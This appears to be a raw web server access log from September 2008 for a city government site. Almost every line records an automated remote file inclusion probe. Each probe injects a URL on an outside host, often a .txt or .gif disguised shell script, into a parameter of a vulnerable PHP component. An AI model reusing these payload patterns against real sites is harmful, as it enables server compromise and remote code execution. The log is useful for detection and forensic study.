89.111.176.30 - - [01/Sep/2008:07:08:16 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://secret-admirer.info/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
89.111.176.30 - - [01/Sep/2008:07:08:16 -0700] "GET //config/dbutil.bck.php?confdir=http://secret-admirer.info/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
89.111.176.30 - - [01/Sep/2008:07:08:17 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://secret-admirer.info/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
89.111.176.116 - - [01/Sep/2008:07:08:43 -0700] "GET /logs/access_080329.log//config/dbutil.bck.php?confdir=http://secret-admirer.info/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
89.111.176.30 - - [01/Sep/2008:07:08:57 -0700] "GET /logs/access_080329.log//config/dbutil.bck.php?confdir=http://secret-admirer.info/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
64.83.0.42 - - [01/Sep/2008:07:10:06 -0700] "GET /logs/access.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://peru.americautos.com/images/super-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
64.83.0.42 - - [01/Sep/2008:07:10:07 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://peru.americautos.com/images/super-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
64.83.0.42 - - [01/Sep/2008:07:10:07 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://peru.americautos.com/images/super-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
202.181.105.117 - - [01/Sep/2008:07:10:16 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://216.155.36.4/~prince/di???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
202.181.105.117 - - [01/Sep/2008:07:10:17 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://216.155.36.4/~prince/di???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
62.140.19.17 - - [01/Sep/2008:07:10:43 -0700] "GET /logs/skin/zero_vote/error.php?dir=http://spelletjeslog.nl/templates/js_matrix_3/images/thumb.png/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "cityofarkadelphia.com"
89.111.184.180 - - [01/Sep/2008:07:11:39 -0700] "GET //templates/mangobery/footer.sample.php?Site_Path=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
74.55.37.146 - - [01/Sep/2008:07:13:08 -0700] "GET /logs/access.log//components/errors.php?error=http://www.thecreativetrust.com/watch/images/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
64.22.111.186 - - [01/Sep/2008:07:13:59 -0700] "GET /logs/skin/zero_vote/error.php?dir=http://spelletjeslog.nl/templates/js_matrix_3/images/thumb.png/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "cityofarkadelphia.com"
64.22.111.186 - - [01/Sep/2008:07:14:00 -0700] "GET /skin/zero_vote/error.php?dir=http://spelletjeslog.nl/templates/js_matrix_3/images/thumb.png/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "cityofarkadelphia.com"
164.41.101.38 - - [01/Sep/2008:07:14:53 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://home.bellavillapattaya.com/modul/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
84.19.180.232 - - [01/Sep/2008:07:16:16 -0700] "GET /logs//mambo//components/com_galleria/galleria.html.php?http://titureddo.altervista.org/vacanze/pinogino.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "cityofarkadelphia.com"
84.19.180.232 - - [01/Sep/2008:07:16:17 -0700] "GET //mambo//components/com_galleria/galleria.html.php?http://titureddo.altervista.org/vacanze/pinogino.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "cityofarkadelphia.com"
209.25.170.26 - - [01/Sep/2008:07:17:12 -0700] "GET /logs/access_080201.log//?_zb_path=http://clickshoprelax.com/script/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
209.25.170.26 - - [01/Sep/2008:07:17:12 -0700] "GET //?_zb_path=http://clickshoprelax.com/script/id1.txt??? HTTP/1.1" 200 917 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
209.25.170.26 - - [01/Sep/2008:07:17:13 -0700] "GET /logs//?_zb_path=http://clickshoprelax.com/script/id1.txt??? HTTP/1.1" 200 4089 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
209.25.170.26 - - [01/Sep/2008:07:17:14 -0700] "GET /logs/access.log//?_zb_path=http://clickshoprelax.com/script/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
97.102.114.191 - - [01/Sep/2008:07:17:39 -0700] "GET /logs/access_080531.log//admin/spaw/spaw_control.class.php?spaw_root=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
97.102.114.191 - - [01/Sep/2008:07:17:39 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
97.102.114.191 - - [01/Sep/2008:07:17:45 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
121.180.11.132 - - [01/Sep/2008:07:19:22 -0700] "GET /logs/access.log//?_zb_path=http://erotica.ltd.uk/edit/help01.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
121.180.11.132 - - [01/Sep/2008:07:19:22 -0700] "GET /logs/access_071101.log//?_zb_path=http://erotica.ltd.uk/edit/help01.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
121.180.11.132 - - [01/Sep/2008:07:19:22 -0700] "GET //?_zb_path=http://erotica.ltd.uk/edit/help01.txt???? HTTP/1.1" 200 917 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
121.180.11.132 - - [01/Sep/2008:07:19:22 -0700] "GET /logs//?_zb_path=http://erotica.ltd.uk/edit/help01.txt???? HTTP/1.1" 200 4089 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
121.180.11.132 - - [01/Sep/2008:07:19:23 -0700] "GET /logs/access_080201.log//?_zb_path=http://erotica.ltd.uk/edit/help01.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
121.180.11.132 - - [01/Sep/2008:07:20:09 -0700] "GET /logs/access_080101.log//?_zb_path=http://erotica.ltd.uk/edit/help01.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
97.102.114.191 - - [01/Sep/2008:07:20:43 -0700] "GET /logs/access_071231.log//skin/zero_vote/error.php?dir=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
97.102.114.191 - - [01/Sep/2008:07:20:43 -0700] "GET //skin/zero_vote/error.php?dir=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
97.102.114.191 - - [01/Sep/2008:07:20:45 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
97.102.114.191 - - [01/Sep/2008:07:20:45 -0700] "GET /logs/access_080101.log//skin/zero_vote/error.php?dir=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
209.25.170.26 - - [01/Sep/2008:07:21:47 -0700] "GET //?_zb_path=http://clickshoprelax.com/script/id1.txt??? HTTP/1.1" 200 917 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
203.251.80.230 - - [01/Sep/2008:07:22:06 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://oursoultvxq.com/bbs/data/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "cityofarkadelphia.com"
203.251.80.230 - - [01/Sep/2008:07:22:06 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://oursoultvxq.com/bbs/data/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "cityofarkadelphia.com"
89.111.184.180 - - [01/Sep/2008:07:23:50 -0700] "GET /logs/access_080330.log//templates/mangobery/footer.sample.php?Site_Path=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
89.111.184.180 - - [01/Sep/2008:07:23:51 -0700] "GET //templates/mangobery/footer.sample.php?Site_Path=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
89.111.184.180 - - [01/Sep/2008:07:23:51 -0700] "GET /logs//templates/mangobery/footer.sample.php?Site_Path=http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
66.185.168.98 - - [01/Sep/2008:07:24:01 -0700] "GET /logs/access.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
66.185.168.98 - - [01/Sep/2008:07:24:02 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
66.185.168.98 - - [01/Sep/2008:07:24:02 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
66.216.26.101 - - [01/Sep/2008:07:24:16 -0700] "GET /logs/access.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
66.216.26.101 - - [01/Sep/2008:07:24:16 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
66.216.26.101 - - [01/Sep/2008:07:24:16 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
202.181.105.117 - - [01/Sep/2008:07:24:17 -0700] "GET //templates/mangobery/footer.sample.php?Site_Path=http://216.155.36.4/~prince/di???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
202.181.105.117 - - [01/Sep/2008:07:24:17 -0700] "GET /logs//templates/mangobery/footer.sample.php?Site_Path=http://216.155.36.4/~prince/di???? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
67.212.173.42 - - [01/Sep/2008:07:24:22 -0700] "GET /logs/access.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
67.212.173.42 - - [01/Sep/2008:07:24:22 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
67.212.173.42 - - [01/Sep/2008:07:24:22 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
213.218.133.175 - - [01/Sep/2008:07:24:30 -0700] "GET //mambo//components/com_galleria/galleria.html.php?http://titureddo.altervista.org/vacanze/vini.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
97.102.114.191 - - [01/Sep/2008:07:25:37 -0700] "GET /logs/access_080501.log//admin/spaw/spaw_control.class.php?spaw_root=http://rox4ever.t35.com/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
89.111.184.180 - - [01/Sep/2008:07:25:58 -0700] "GET //mambo//components/com_galleria/galleria.html.php?http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
89.111.184.180 - - [01/Sep/2008:07:26:39 -0700] "GET /logs/access.log//mambo//components/com_galleria/galleria.html.php?http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
89.111.184.180 - - [01/Sep/2008:07:26:39 -0700] "GET //mambo//components/com_galleria/galleria.html.php?http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
89.111.184.180 - - [01/Sep/2008:07:26:40 -0700] "GET /logs//mambo//components/com_galleria/galleria.html.php?http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
195.39.5.203 - - [01/Sep/2008:07:26:40 -0700] "GET /logs/access_080201.log//skin/zero_vote/error.php?dir=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "cityofarkadelphia.com"
195.39.5.203 - - [01/Sep/2008:07:26:41 -0700] "GET //skin/zero_vote/error.php?dir=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "cityofarkadelphia.com"
195.39.5.203 - - [01/Sep/2008:07:26:48 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "cityofarkadelphia.com"
74.55.37.146 - - [01/Sep/2008:07:28:53 -0700] "GET /logs/access.log/head.php?adresa=http://www.thecreativetrust.com/watch/images/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
74.55.37.146 - - [01/Sep/2008:07:28:53 -0700] "GET /head.php?adresa=http://www.thecreativetrust.com/watch/images/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
74.55.37.146 - - [01/Sep/2008:07:28:53 -0700] "GET /logs/head.php?adresa=http://www.thecreativetrust.com/watch/images/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
61.47.10.168 - - [01/Sep/2008:07:29:02 -0700] "GET /inc/cmses/aedatingCMS.php?dir[inc]=http://home.bellavillapattaya.com/modul/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
195.39.5.203 - - [01/Sep/2008:07:29:38 -0700] "GET /logs/access_080201.log//skin/zero_vote/error.php?dir=http://www.geocities.com/kucluxanang/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
195.39.5.203 - - [01/Sep/2008:07:29:39 -0700] "GET //skin/zero_vote/error.php?dir=http://www.geocities.com/kucluxanang/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
195.39.5.203 - - [01/Sep/2008:07:29:40 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.geocities.com/kucluxanang/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
195.39.5.203 - - [01/Sep/2008:07:29:50 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://www.geocities.com/kucluxanang/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
195.39.5.203 - - [01/Sep/2008:07:30:08 -0700] "GET /logs/access_080201.log//skin/zero_vote/error.php?dir=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
195.39.5.203 - - [01/Sep/2008:07:30:10 -0700] "GET //skin/zero_vote/error.php?dir=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
195.39.5.203 - - [01/Sep/2008:07:30:11 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
195.39.5.203 - - [01/Sep/2008:07:30:21 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
195.39.5.203 - - [01/Sep/2008:07:30:29 -0700] "GET /logs/access_080201.log//skin/zero_vote/error.php?dir=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
195.39.5.203 - - [01/Sep/2008:07:30:32 -0700] "GET //skin/zero_vote/error.php?dir=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
195.39.5.203 - - [01/Sep/2008:07:30:33 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
195.39.5.203 - - [01/Sep/2008:07:30:48 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
74.6.22.119 - - [01/Sep/2008:07:34:36 -0700] "GET /Downloads/?D=D HTTP/1.0" 200 655 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "cityofarkadelphia.com"
67.205.111.117 - - [01/Sep/2008:07:35:01 -0700] "GET /logs/errors.php?error=http://weblime.ru/seahorse/mambo??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "cityofarkadelphia.com"
67.205.111.117 - - [01/Sep/2008:07:35:01 -0700] "GET /errors.php?error=http://weblime.ru/seahorse/mambo??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "cityofarkadelphia.com"
164.41.101.38 - - [01/Sep/2008:07:35:58 -0700] "GET //components/com_simpleboard/image_upload.php?sbp=http://home.bellavillapattaya.com/modul/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
78.129.138.76 - - [01/Sep/2008:07:36:06 -0700] "GET /logs/access_080701.log///bemarket/postscript/postscript.php?p_mode=http://secret-admirer.info/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "cityofarkadelphia.com"
61.47.10.168 - - [01/Sep/2008:07:37:11 -0700] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://home.bellavillapattaya.com/modul/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
195.39.5.203 - - [01/Sep/2008:07:37:57 -0700] "GET //skin/zero_vote/error.php?dir=http://www.lesplaisirslibertins.com/backup/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
66.185.168.98 - - [01/Sep/2008:07:38:35 -0700] "GET /logs/access_080531.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
67.212.173.42 - - [01/Sep/2008:07:38:50 -0700] "GET /logs/access_080531.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "cityofarkadelphia.com"
216.70.73.146 - - [01/Sep/2008:07:39:33 -0700] "GET /logs/access_080401.log//skin/zero_vote/ask_password.php?dir=http://outsourcing.in.ua/data/apteka/.log/idscan9?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "cityofarkadelphia.com"
216.70.73.146 - - [01/Sep/2008:07:39:34 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://outsourcing.in.ua/data/apteka/.log/idscan9?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "cityofarkadelphia.com"
66.216.26.101 - - [01/Sep/2008:07:39:39 -0700] "GET /logs/access_080531.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
216.70.73.146 - - [01/Sep/2008:07:40:01 -0700] "GET /logs/access_080401.log//skin/zero_vote/ask_password.php?dir=http://outsourcing.in.ua/data/apteka/.log/idscan9?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
216.70.73.146 - - [01/Sep/2008:07:40:01 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://outsourcing.in.ua/data/apteka/.log/idscan9?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
216.70.73.146 - - [01/Sep/2008:07:40:01 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://outsourcing.in.ua/data/apteka/.log/idscan9?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
67.205.111.117 - - [01/Sep/2008:07:40:28 -0700] "GET /logs/access_080701.log///bemarket/postscript/postscript.php?p_mode=http://www.geoduck.org/cache/cmd7.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
216.70.73.146 - - [01/Sep/2008:07:41:02 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://outsourcing.in.ua/data/apteka/.log/idscan9?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "cityofarkadelphia.com"
83.246.118.249 - - [01/Sep/2008:07:42:23 -0700] "GET ///vwar/backup/errors.php?error=http://manu.freeunlimitedweb.com/id.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
69.7.34.177 - - [01/Sep/2008:07:42:50 -0700] "GET /logs/access_080401.log//skin/zero_vote/ask_password.php?dir=http://outsourcing.in.ua/data/apteka/.log/idscan9?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "cityofarkadelphia.com"
69.7.34.177 - - [01/Sep/2008:07:47:12 -0700] "GET /logs/access_080401.log//skin/zero_vote/ask_password.php?dir=http://outsourcing.in.ua/data/apteka/.log/idscan9?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
69.7.34.177 - - [01/Sep/2008:07:47:19 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://outsourcing.in.ua/data/apteka/.log/idscan9?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
69.7.34.177 - - [01/Sep/2008:07:47:26 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://outsourcing.in.ua/data/apteka/.log/idscan9?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "cityofarkadelphia.com"
89.111.184.180 - - [01/Sep/2008:07:48:31 -0700] "GET /logs/access_080201.log//mambo//components/com_galleria/galleria.html.php?http://www.all-cs.ru/files/data/media/73/osy2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
207.58.167.158 - - [01/Sep/2008:07:48:42 -0700] "GET /admin/editeur/spaw_control.class.php?spaw_root=http://www.geoduck.org/cache/cmd7.gif?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "cityofarkadelphia.com"
207.58.167.158 - - [01/Sep/2008:07:48:42 -0700] "GET /logs/admin/editeur/spaw_control.class.php?spaw_root=http://www.geoduck.org/cache/cmd7.gif?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "cityofarkadelphia.com"
64.22.111.186 - - [01/Sep/2008:07:51:37 -0700] "GET //constants.php?_CCFG[_PKG_PATH_INCL]=http://spelletjeslog.nl/templates/js_matrix_3/images/thumb.png/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "cityofarkadelphia.com"
63.208.74.34 - - [01/Sep/2008:07:52:33 -0700] "GET /administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
63.208.74.34 - - [01/Sep/2008:07:52:57 -0700] "GET /logs/access_080329.log/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
63.208.74.34 - - [01/Sep/2008:07:52:57 -0700] "GET /administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
63.208.74.34 - - [01/Sep/2008:07:52:57 -0700] "GET /logs/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
213.218.133.175 - - [01/Sep/2008:07:53:10 -0700] "GET /logs/access.log//mambo//components/com_galleria/galleria.html.php?http://titureddo.altervista.org/vacanze/vini.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
213.218.133.175 - - [01/Sep/2008:07:53:10 -0700] "GET //mambo//components/com_galleria/galleria.html.php?http://titureddo.altervista.org/vacanze/vini.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
213.218.133.175 - - [01/Sep/2008:07:53:10 -0700] "GET /logs//mambo//components/com_galleria/galleria.html.php?http://titureddo.altervista.org/vacanze/vini.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
67.205.111.117 - - [01/Sep/2008:07:53:23 -0700] "GET /lostpasswd.php?env[include_prefix]=http://weblime.ru/seahorse/mambo??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "cityofarkadelphia.com"
67.205.111.117 - - [01/Sep/2008:07:53:23 -0700] "GET /logs/lostpasswd.php?env[include_prefix]=http://weblime.ru/seahorse/mambo??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "cityofarkadelphia.com"
63.208.74.34 - - [01/Sep/2008:07:53:57 -0700] "GET /logs/access.log/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "cityofarkadelphia.com"
